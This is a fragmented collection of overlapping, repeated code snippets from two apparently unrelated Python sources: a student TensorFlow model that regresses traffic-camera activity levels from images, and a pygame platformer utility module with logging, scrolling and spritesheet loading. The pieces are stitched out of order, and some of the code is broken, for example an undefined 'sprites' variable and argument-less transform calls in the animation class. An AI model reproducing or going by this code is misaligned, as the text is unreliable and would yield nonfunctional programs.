255.0 # normalize to [0,1] range # print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype)", "Spring 2019 Final Project This python file trains a neural network that predicts", "#print(df_train) #print(\"---\") #print(df_valid) def keras_data(data): # Output arrays x = np.empty([0, 160, 160,", "sess.as_default(): np_array = img_tensor.eval() #print(\"np from tensor\", np_array.shape) indexed_array = np.expand_dims(np_array, axis=0) #print(\"np", "+ data.people[data.index[i]] #print(y_value) #y = np.append(y, [y_value]) y[i] = y_value # convert image", "np_array = img_tensor.eval() #print(\"np from tensor\", np_array.shape) indexed_array = np.expand_dims(np_array, axis=0) #print(\"np from", "cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) #print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image)", "x_train, y_train = keras_data(df_train) x_test, y_test = keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test", "on Lynda.com \"\"\" # view sample image img_path = \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt')", "Project This python file trains a neural network that predicts an activity level", "10) model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu',", "to [0,1] range # print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess = tf.Session() with sess.as_default():", "i in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y =", "#print(df_valid) def keras_data(data): # Output arrays x = np.empty([0, 160, 160, 3], dtype=np.float32)", "in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y = np.append(y,", "with index\",indexed_array.shape) x = np.append(x, indexed_array, axis=0) #print(\"x shape\", x.shape) #print(y.shape) return x,", "np.append(x, indexed_array, axis=0) #print(\"x shape\", x.shape) #print(y.shape) return x, y x_train, y_train =", "model_selection import tensorflow as tf from pathlib import Path \"\"\" <NAME>, WAK2116, ELEN-E6889,", "indexed_array, axis=0) #print(\"x shape\", x.shape) #print(y.shape) return x, y x_train, y_train = keras_data(df_train)", "return x, y x_train, y_train = keras_data(df_train) x_test, y_test = keras_data(df_valid) #y_train =", "on image data. It is loosely based on TF image classification examples and", "x_train / 255 #x_test = x_test / 255 #y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test", "#output_image = tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor, [160, 160]) #img_tensor =", "# Output arrays x = np.empty([0, 160, 160, 3], dtype=np.float32) y = np.empty([data.datetime.count()],", "np.expand_dims(np_array, axis=0) #print(\"np from tensor with index\",indexed_array.shape) x = np.append(x, indexed_array, axis=0) #print(\"x", "= x_test / 255 #y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test, 10) model", "epochs=30, validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000 ) # save structure model_structure = model.to_json()", "tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32,", "of images sess = tf.Session() for i in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value =", "y_test = keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test = tf.keras.utils.to_categorical(y_test, 16) y_train =", "16 #(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train", "<NAME>, WAK2116, ELEN-E6889, Spring 2019 Final Project This python file trains a neural", "#y = np.append(y, [y_value]) y[i] = y_value # convert image to a tensor", "Final Project This python file trains a neural network that predicts an activity", "y_test = y_test / 16 #(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\")", "img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160,", "images sess = tf.Session() for i in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]]", "dtype=np.float32) #print(x.shape) #print(y.shape) # Read in and preprocess a batch of images sess", "tf.keras.utils.to_categorical(y_test, 16) y_train = y_train / 16 y_test = y_test / 16 #(x_train,", "= tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220)", "a traffic camera This is an initial attempt at doing regression based on", "# squish it down a bit img_tensor /= 255.0 # normalize to [0,1]", "as pd from sklearn import model_selection import tensorflow as tf from pathlib import", "on a jpg image from a traffic camera This is an initial attempt", "= tf.keras.utils.to_categorical(y_train, 16) #y_test = tf.keras.utils.to_categorical(y_test, 16) y_train = y_train / 16 y_test", "y_train / 16 y_test = y_test / 16 #(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data()", "range # print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess = tf.Session() with sess.as_default(): np_array =", "from a traffic camera This is an initial attempt at doing regression based", "tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same',", "pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def keras_data(data): #", "activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2))", "3], dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) # Read in and preprocess", "classification examples and \"Deep Leaning: Image Recognition\" on Lynda.com \"\"\" # view sample", "padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25))", "tf from pathlib import Path \"\"\" <NAME>, WAK2116, ELEN-E6889, Spring 2019 Final Project", "160, 3], dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) # Read in and", "axis=0) #print(\"x shape\", x.shape) #print(y.shape) return x, y x_train, y_train = keras_data(df_train) x_test,", "3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same',", "optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit( x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True", "as tf from pathlib import Path \"\"\" <NAME>, WAK2116, ELEN-E6889, Spring 2019 Final", "y_test / 16 #(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test =", "tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor, [160, 160]) #img_tensor = tf.image.resize(img_tensor, [240,", "Lynda.com \"\"\" # view sample image img_path = \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df)", "tf.image.resize(img_tensor, [240, 240]) # squish it down a bit img_tensor /= 255.0 #", "= pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def keras_data(data):", "input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25))", "it down a bit img_tensor /= 255.0 # normalize to [0,1] range #", "= tf.Session() with sess.as_default(): np_array = img_tensor.eval() #print(\"np from tensor\", np_array.shape) indexed_array =", "tf.Session() for i in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value)", "= tf.image.resize(img_tensor, [240, 240]) # squish it down a bit img_tensor /= 255.0", "sess = tf.Session() with sess.as_default(): np_array = img_tensor.eval() #print(\"np from tensor\", np_array.shape) indexed_array", "level based on a jpg image from a traffic camera This is an", "image from a traffic camera This is an initial attempt at doing regression", "image classification examples and \"Deep Leaning: Image Recognition\" on Lynda.com \"\"\" # view", "activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse',", "img_raw = tf.read_file(sample_img_path) image_file = img_path + data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor", "that predicts an activity level based on a jpg image from a traffic", "indexed_array = np.expand_dims(np_array, axis=0) #print(\"np from tensor with index\",indexed_array.shape) x = np.append(x, indexed_array,", "model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\",", "#print(y_value) #y = np.append(y, [y_value]) y[i] = y_value # convert image to a", "Path \"\"\" <NAME>, WAK2116, ELEN-E6889, Spring 2019 Final Project This python file trains", "network that predicts an activity level based on a jpg image from a", ") # save structure model_structure = model.to_json() f = Path(\"model_structure.json\") f.write_text(model_structure) # save", "/ 16 #(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\")", "#print(df) df_train, df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def keras_data(data): # Output", "= tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160, 160,", "data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80,", "regression based on image data. It is loosely based on TF image classification", "a jpg image from a traffic camera This is an initial attempt at", "model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100,", "This python file trains a neural network that predicts an activity level based", "model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam'," ]
[ "for Some Platformer Game Created by sheepy0125 02/10/2021 \"\"\" from pathlib import Path", "messages with ease\"\"\" colors: dict = { \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\",", "############################# ### Scroll handling class ### ############################# class Scrolling: scroll_x: float = 0", "= 0 max_scroll_x: float = 0 max_scroll_y: float = 0 @staticmethod def setup_scrolling(map_size,", "print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" ) #############################", "scroll_x: float = 0 scroll_y: float = 0 max_scroll_x: float = 0 max_scroll_y:", "add_extra_sprites(self): for i in self.dict: copied_sprites = self.dict[i].copy() squashed_sprites = [] stretched_sprites =", ">= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict", "(line {error.__traceback__.tb_lineno})\" ) ############################# ### Scroll handling class ### ############################# class Scrolling: scroll_x:", "/ 10 # Don't allow scrolling off the map # X axis if", "= 0 max_scroll_y: float = 0 @staticmethod def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\"", "Scrolling.scroll_y = Scrolling.max_scroll_y class Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names)", "- scroll_offset[0] ) / 10 Scrolling.scroll_y += ( player_pos[1] - Scrolling.scroll_y - scroll_offset[1]", "columns rows is number of rows \"\"\" spritesheet = pygame.image.load(image_path) sprite_width = spritesheet.get_width()", "is number of rows \"\"\" spritesheet = pygame.image.load(image_path) sprite_width = spritesheet.get_width() / cols", "Center player Scrolling.scroll_x += ( player_pos[0] - Scrolling.scroll_x - scroll_offset[0] ) / 10", "Path = Path(__file__).parent.parent #################### ### Logger class ### #################### class Logger: \"\"\"Log messages", "- scroll_offset[1] ) / 10 # Don't allow scrolling off the map #", "- (screen_size[0]) Scrolling.max_scroll_y = (map_size[1] * tile_size) - (screen_size[1]) - 50 Logger.log( f\"Max", "range(rows): # loop through the number of rows y_pos = row_num * sprite_height", "Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x # Y axis if Scrolling.scroll_y <= 0:", "the width x_pos = col_num * sprite_width row_images = [] for row_num in", "multiplying # the column that its on by the width x_pos = col_num", "} @staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\")", "(map_size[1] * tile_size) - (screen_size[1]) - 50 Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" )", "\"\"\"Update scrolling\"\"\" # Center player Scrolling.scroll_x += ( player_pos[0] - Scrolling.scroll_x - scroll_offset[0]", "number of columns for col_num in range(cols): # get the x position of", "[] # loop through the number of columns for col_num in range(cols): #", "Scrolling.scroll_x = 0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x # Y axis", "= (x_pos, y_pos, sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect) if sprite.get_buffer().raw == empty_image: continue", "axis if Scrolling.scroll_y <= 0: Scrolling.scroll_y = 0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y", "self.dict: copied_sprites = self.dict[i].copy() squashed_sprites = [] stretched_sprites = [] for i in", "spritesheet cols is number of columns rows is number of rows \"\"\" spritesheet", "max_scroll_x: float = 0 max_scroll_y: float = 0 @staticmethod def setup_scrolling(map_size, tile_size, screen_size):", "str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" )", "range(len(sprites)): self.dict[dict_names[i]] = sprites[i] def add_extra_sprites(self): for i in self.dict: copied_sprites = self.dict[i].copy()", "loop through the number of rows y_pos = row_num * sprite_height sprite_rect =", "\"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", } @staticmethod def log(message: str):", "float = 0 max_scroll_x: float = 0 max_scroll_y: float = 0 @staticmethod def", "/ 10 Scrolling.scroll_y += ( player_pos[1] - Scrolling.scroll_y - scroll_offset[1] ) / 10", "class ### #################### class Logger: \"\"\"Log messages with ease\"\"\" colors: dict = {", "cols is number of columns rows is number of rows \"\"\" spritesheet =", "setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] * tile_size) - (screen_size[0]) Scrolling.max_scroll_y", "spritesheet = pygame.image.load(image_path) sprite_width = spritesheet.get_width() / cols sprite_height = spritesheet.get_height() / rows", "@staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod", "= [] for row_num in range(rows): # loop through the number of rows", "self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def load_dict(self,dict_names): for i in range(len(sprites)): self.dict[dict_names[i]]", "[] stretched_sprites = [] for i in copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append()", "### ############### ROOT_PATH: Path = Path(__file__).parent.parent #################### ### Logger class ### #################### class", "\"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", } @staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def", "10 Scrolling.scroll_y += ( player_pos[1] - Scrolling.scroll_y - scroll_offset[1] ) / 10 #", "/ cols sprite_height = spritesheet.get_height() / rows empty_image = pygame.Surface((sprite_width,sprite_height)).get_buffer().raw rows = []", "Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x # Y axis if Scrolling.scroll_y <= 0: Scrolling.scroll_y =", "= [] stretched_sprites = [] for i in copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append()", "y_pos, sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect) if sprite.get_buffer().raw == empty_image: continue row_images.append(sprite) rows.append(row_images)", "Scrolling.scroll_x - scroll_offset[0] ) / 10 Scrolling.scroll_y += ( player_pos[1] - Scrolling.scroll_y -", "scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" # Center player", "0: Scrolling.scroll_x = 0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x # Y", "for row_num in range(rows): # loop through the number of rows y_pos =", "handling class ### ############################# class Scrolling: scroll_x: float = 0 scroll_y: float =", "( player_pos[0] - Scrolling.scroll_x - scroll_offset[0] ) / 10 Scrolling.scroll_y += ( player_pos[1]", "ROOT_PATH: Path = Path(__file__).parent.parent #################### ### Logger class ### #################### class Logger: \"\"\"Log", "# X axis if Scrolling.scroll_x <= 0: Scrolling.scroll_x = 0 elif Scrolling.scroll_x >=", "Scrolling.scroll_x += ( player_pos[0] - Scrolling.scroll_x - scroll_offset[0] ) / 10 Scrolling.scroll_y +=", ") @staticmethod def update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" # Center player Scrolling.scroll_x += (", "scroll_offset[1] ) / 10 # Don't allow scrolling off the map # X", "through the number of rows y_pos = row_num * sprite_height sprite_rect = (x_pos,", "print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception): Logger.fatal(", "for col_num in range(cols): # get the x position of the sprite by", "Scrolling.scroll_x <= 0: Scrolling.scroll_x = 0 elif Scrolling.scroll_x >= Scrolling.max_scroll_x: Scrolling.scroll_x = Scrolling.max_scroll_x", "@staticmethod def update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" # Center player Scrolling.scroll_x += ( player_pos[0]", "is number of columns rows is number of rows \"\"\" spritesheet = pygame.image.load(image_path)", "i in range(len(sprites)): self.dict[dict_names[i]] = sprites[i] def add_extra_sprites(self): for i in self.dict: copied_sprites", "{error.__traceback__.tb_lineno})\" ) ############################# ### Scroll handling class ### ############################# class Scrolling: scroll_x: float", "Created by sheepy0125 02/10/2021 \"\"\" from pathlib import Path ############### ### Globals ###", "Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict =", "scrolling off the map # X axis if Scrolling.scroll_x <= 0: Scrolling.scroll_x =", "= self.load_dict(dict_names) def load_dict(self,dict_names): for i in range(len(sprites)): self.dict[dict_names[i]] = sprites[i] def add_extra_sprites(self):", "\"normal\": \"\\033[0m\", } @staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message: str):", "Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def load_dict(self,dict_names): for i", "= (map_size[1] * tile_size) - (screen_size[1]) - 50 Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\"", "@staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}: {str(error)}", "sprites[i] def add_extra_sprites(self): for i in self.dict: copied_sprites = self.dict[i].copy() squashed_sprites = []", "number of rows y_pos = row_num * sprite_height sprite_rect = (x_pos, y_pos, sprite_width,", "############################# class Scrolling: scroll_x: float = 0 scroll_y: float = 0 max_scroll_x: float", "* tile_size) - (screen_size[1]) - 50 Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod", "Globals ### ############### ROOT_PATH: Path = Path(__file__).parent.parent #################### ### Logger class ### ####################", "sprite_width row_images = [] for row_num in range(rows): # loop through the number", "(screen_size[0]) Scrolling.max_scroll_y = (map_size[1] * tile_size) - (screen_size[1]) - 50 Logger.log( f\"Max scrolling:", "( player_pos[1] - Scrolling.scroll_y - scroll_offset[1] ) / 10 # Don't allow scrolling", "50 Logger.log( f\"Max scrolling: ({Scrolling.max_scroll_x}, {Scrolling.max_scroll_y})\" ) @staticmethod def update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\"", "row_images = [] for row_num in range(rows): # loop through the number of", "Logger.fatal( f\"{type(error).__name__}: {str(error)} (line {error.__traceback__.tb_lineno})\" ) ############################# ### Scroll handling class ### #############################", "the sprite by multiplying # the column that its on by the width", "def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\") @staticmethod def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def", "get_images_from_spritesheet(image_path, cols, rows): \"\"\" get the images from the spritesheet cols is number", "{message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def log_error(error: Exception): Logger.fatal( f\"{type(error).__name__}:", "by the width x_pos = col_num * sprite_width row_images = [] for row_num", "### Scroll handling class ### ############################# class Scrolling: scroll_x: float = 0 scroll_y:", "class Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites = self.get_images_from_spritesheet(image_path,cols,rows) self.dict = self.load_dict(dict_names) def load_dict(self,dict_names): for", "col_num in range(cols): # get the x position of the sprite by multiplying", "pathlib import Path ############### ### Globals ### ############### ROOT_PATH: Path = Path(__file__).parent.parent ####################", "= [] # loop through the number of columns for col_num in range(cols):", "copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows): \"\"\" get the", "# get the x position of the sprite by multiplying # the column", "the column that its on by the width x_pos = col_num * sprite_width", "0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class Animations: def __init__(self,image_path,cols,rows,dict_names): self.sprites", "float = 0 max_scroll_y: float = 0 @staticmethod def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup", "from the spritesheet cols is number of columns rows is number of rows", "= 0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class Animations: def __init__(self,image_path,cols,rows,dict_names):", "Scrolling.scroll_y <= 0: Scrolling.scroll_y = 0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y", "squashed_sprites = [] stretched_sprites = [] for i in copied_sprites: squashed_sprite = pygame.transform.scale()", "[] for row_num in range(rows): # loop through the number of rows y_pos", "Platformer Game Created by sheepy0125 02/10/2021 \"\"\" from pathlib import Path ############### ###", "class Logger: \"\"\"Log messages with ease\"\"\" colors: dict = { \"log\": \"\\033[92m\", \"warn\":", "* tile_size) - (screen_size[0]) Scrolling.max_scroll_y = (map_size[1] * tile_size) - (screen_size[1]) - 50", "{str(error)} (line {error.__traceback__.tb_lineno})\" ) ############################# ### Scroll handling class ### ############################# class Scrolling:", "[] for i in copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols,", "through the number of columns for col_num in range(cols): # get the x", "= 0 @staticmethod def setup_scrolling(map_size, tile_size, screen_size): \"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] *", "player_pos[1] - Scrolling.scroll_y - scroll_offset[1] ) / 10 # Don't allow scrolling off", "############### ROOT_PATH: Path = Path(__file__).parent.parent #################### ### Logger class ### #################### class Logger:", "(map_size[0] * tile_size) - (screen_size[0]) Scrolling.max_scroll_y = (map_size[1] * tile_size) - (screen_size[1]) -", "sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect) if sprite.get_buffer().raw == empty_image: continue row_images.append(sprite) rows.append(row_images) return", "{Scrolling.max_scroll_y})\" ) @staticmethod def update_scrolling(player_pos, scroll_offset): \"\"\"Update scrolling\"\"\" # Center player Scrolling.scroll_x +=", "#################### class Logger: \"\"\"Log messages with ease\"\"\" colors: dict = { \"log\": \"\\033[92m\",", "x_pos = col_num * sprite_width row_images = [] for row_num in range(rows): #", "the number of rows y_pos = row_num * sprite_height sprite_rect = (x_pos, y_pos,", "that its on by the width x_pos = col_num * sprite_width row_images =", "+= ( player_pos[1] - Scrolling.scroll_y - scroll_offset[1] ) / 10 # Don't allow", "############### ### Globals ### ############### ROOT_PATH: Path = Path(__file__).parent.parent #################### ### Logger class", "\"\"\" Tools for Some Platformer Game Created by sheepy0125 02/10/2021 \"\"\" from pathlib", "col_num * sprite_width row_images = [] for row_num in range(rows): # loop through", "squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows): \"\"\" get the images", "for i in range(len(sprites)): self.dict[dict_names[i]] = sprites[i] def add_extra_sprites(self): for i in self.dict:", "def load_dict(self,dict_names): for i in range(len(sprites)): self.dict[dict_names[i]] = sprites[i] def add_extra_sprites(self): for i", "\"\"\"Setup scrolling\"\"\" Scrolling.max_scroll_x = (map_size[0] * tile_size) - (screen_size[0]) Scrolling.max_scroll_y = (map_size[1] *", "its on by the width x_pos = col_num * sprite_width row_images = []", "\"warn\": \"\\033[93m\", \"fatal\": \"\\033[91m\", \"normal\": \"\\033[0m\", } @staticmethod def log(message: str): print(f\"{Logger.colors['log']}[INFO] {message}{Logger.colors['normal']}\")", "load_dict(self,dict_names): for i in range(len(sprites)): self.dict[dict_names[i]] = sprites[i] def add_extra_sprites(self): for i in", "0: Scrolling.scroll_y = 0 elif Scrolling.scroll_y >= Scrolling.max_scroll_y: Scrolling.scroll_y = Scrolling.max_scroll_y class Animations:", "### #################### class Logger: \"\"\"Log messages with ease\"\"\" colors: dict = { \"log\":", "def warn(message: str): print(f\"{Logger.colors['warn']}[WARN] {message}{Logger.colors['normal']}\") @staticmethod def fatal(message: str): print(f\"{Logger.colors['fatal']}[FAIL] {message}{Logger.colors['normal']}\") @staticmethod def", "for i in copied_sprites: squashed_sprite = pygame.transform.scale() squashed_sprites.append() stretched_sprites.append() def get_images_from_spritesheet(image_path, cols, rows):", "class ### ############################# class Scrolling: scroll_x: float = 0 scroll_y: float = 0", "(x_pos, y_pos, sprite_width, sprite_height) sprite = spritesheet.subsurface(sprite_rect) if sprite.get_buffer().raw == empty_image: continue row_images.append(sprite)", "\"\"\"Log messages with ease\"\"\" colors: dict = { \"log\": \"\\033[92m\", \"warn\": \"\\033[93m\", \"fatal\":", "= col_num * 